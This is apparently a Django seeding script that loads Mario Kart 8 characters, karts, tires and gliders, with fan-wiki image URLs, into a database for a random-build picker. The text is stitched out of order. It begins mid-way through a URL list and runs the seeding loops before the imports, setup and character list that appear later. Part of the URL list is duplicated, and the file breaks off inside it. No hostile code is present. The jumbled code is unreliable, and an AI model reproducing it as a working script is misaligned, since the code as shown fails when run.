'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr'
,
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525'
,
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr'
,
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png'
,
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png'
,
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129'
,
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png'
,
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr'
,
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112'
,
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405'
,
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png'
,
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png'
,
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543'
,
'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en'
,
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png'
,
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr'
]
car_names = ['Standard Kart', 'Pipe Frame', 'Mach 8', 'Steel Driver',
'Cat Cruiser', 'Circuit Special', 'Tri-Speeder', 'Badwagon', 'Prancer',
'Biddybuggy', 'Landship', 'Sneeker', 'Sports Coupe', 'Gold Standard',
'GLA', 'W 25 Silver Arrow', '300 SL Roadster', 'Blue Falcon',
'Tanooki Kart', 'B Dasher', 'Streetle', 'P-Wing', 'Koopa Clown',
'Standard Bike', 'Comet', 'Sport Bike', 'The Duke', 'Flame Rider',
'Varmint', 'Mr. Scooty', 'Jet Bike', 'Yoshi Bike', 'Master Cycle',
'Master Cycle Zero', 'City Tripper', 'Standard ATV', 'Wild Wiggler',
'Teddy Buggy', 'Bone Rattler', 'Splat Buggy', 'Inkstriker']
car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932'
,
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956'
,
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237'
,
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350'
,
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333'
,
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656'
,
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625'
,
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333'
,
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'
,
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'
,
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545'
,
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836'
,
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005'
,
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107'
,
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052'
,
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857'
,
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819'
,
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951'
,
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925'
,
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928'
,
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256'
,
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734'
,
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936'
,
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601'
,
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111'
,
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108'
,
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814'
,
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507'
]
tire_names = ['Standard', 'Monster', 'Roller', 'Slim', 'Slick', 'Metal',
'Button', 'Off-Road', 'Sponge', 'Wood', 'Cushion', 'Blue Standard',
'Hot Monster', 'Azure Roller', 'Crimson Slim', 'Cyber Slick',
'Retro Off-Road', 'Gold Tires', 'GLA Tires', 'Triforce Tires',
'Ancient Tyres', 'Leaf Tires']
tire_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545'
,
'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541'
,
'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536'
,
'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542'
,
'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533'
,
'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541'
,
'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559'
,
'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549'
,
'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724'
,
'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817'
,
'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338'
,
'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627'
,
'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626'
,
'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629'
,
'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630'
,
'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539'
,
'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810'
]
glider_names = ['Super Glider', 'Cloud Glider', 'Wario Wing', 'Waddle Wing',
'Peach Parasol', 'Parachute', 'Parafoil', 'Flower Glider',
'Bowser Kite', 'Plane Glider', 'MKTV Parafoil', 'Gold Glider',
'Hylian Kite', 'Paraglider', 'Paper Glider']
glider_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815'
,
'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838'
,
'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853'
,
'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940'
,
'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830'
,
'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909'
,
'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930'
,
'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947'
,
'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956'
,
'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731'
,
'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313'
]
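# Sanity check added here as a defensive assumption (it is not part of the
# original seeding logic): each *_names list must line up one-to-one with its
# *_urls list, otherwise the loops below would pair a name with the wrong
# image or raise an IndexError part-way through.
for _names, _urls in ((char_names, char_urls), (car_names, car_urls),
                      (tire_names, tire_urls), (glider_names, glider_urls)):
    assert len(_names) == len(_urls), 'name/url lists are out of sync'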
# Seed the Character table. Characters get a 1-based display index, but
# colour variants (the extra Yoshis, Shy Guys, and "(G)" alternates) are
# stored with index=None so they do not shift the numbering of later
# characters.
variant_count = 0
for pos, (name, url) in enumerate(zip(char_names, char_urls)):
    if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:
        variant_count += 1
        index = None
    else:
        index = pos - variant_count + 1
    Character(name=name, image_url=url, index=index).save()

# Tires, vehicles and gliders are simply numbered in list order.
for pos, (name, url) in enumerate(zip(tire_names, tire_urls), start=1):
    Tire(name=name, image_url=url, index=pos).save()

for pos, (name, url) in enumerate(zip(car_names, car_urls), start=1):
    Vehicle(name=name, image_url=url, index=pos).save()

for pos, (name, url) in enumerate(zip(glider_names, glider_urls), start=1):
    Glider(name=name, image_url=url, index=pos).save()
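# Quick smoke test (an added convenience, assuming the script is run as a
# one-off seeder): report how many rows of each type now exist.
print('seeded',
      Character.objects.count(), 'characters,',
      Vehicle.objects.count(), 'vehicles,',
      Tire.objects.count(), 'tires,',
      Glider.objects.count(), 'gliders')

# For context, main/models.py is not shown here; a minimal sketch of what it
# presumably defines (field names inferred from the constructor calls above):
#
#     from django.db import models
#
#     class Character(models.Model):
#         name = models.CharField(max_length=100)
#         # Some of the artwork URLs above run to several hundred characters,
#         # so the field must allow more than URLField's default 200.
#         image_url = models.URLField(max_length=2000)
#         index = models.IntegerField(null=True, blank=True)
#
#     # Vehicle, Tire and Glider are assumed to carry the same three fields,
#     # with index always populated.
#
# The script itself is presumably run once from the project root
# (e.g. `python seed.py` after `manage.py migrate`), since it calls
# django.setup() directly instead of going through a management command.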
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE','mkrandom.settings')
import django
django.setup()
from main.models import Character, Vehicle, Tire, Glider
char_names = [
'Mario',
'Luigi',
'Peach',
'Daisy',
'Rosalina',
'Mario Tanooki',
'Peach cat',
'Yoshi',
'Yoshi (LBlue)',
'Yoshi (Black)',
'Yoshi (Rose)',
'Yoshi (Yellow)',
'Yoshi (White)',
'Yoshi (Blue)',
'Yoshi (Rose)',
'Yoshi (Orange)',
'Toad',
'Koopa',
'Shyguy',
'Shyguy (LB)',
'Shyguy (Black)',
'Shyguy (Rose)',
'Shyguy (Yellow)',
'Shyguy (White)',
'Shyguy (Blue)',
'Shyguy (Rose)',
'Shyguy (Orange)',
'Lakitu',
'Toadette',
'Boo',
'Baby Mario',
'Baby Luigi',
'Baby Peach',
'Baby Daisy',
'Baby Rosalina',
'Metal Mario',
'Golden Mario',
'Golden Peach',
'Wario',
'Waluigi',
'Donkey Kong',
'Bowser',
'Skelerex',
'Bowser Jr',
'Dry Bowser',
'Lemmy',
'Larry',
'Wendy',
'Ludwig',
'Iggy',
'Roy',
'Morton',
'Inkling (G)',
'Inkling (B)',
'Link (SSBU)',
'Link (BOTW)',
'Villager (B)',
'Villager(G)',
'Mary',
]
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr',
'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr',
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png',
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png',
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809',
'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr',
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr',
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png',
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png',
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr',
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo',
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png',
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM',
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ',
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708',
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649',
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910',
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014',
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222',
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png',
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png',
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117',
'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323',
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8',
'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141',
'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr',
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525',
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png',
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png',
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129',
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png',
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr',
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr',
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112',
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405',
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png',
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png',
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543',
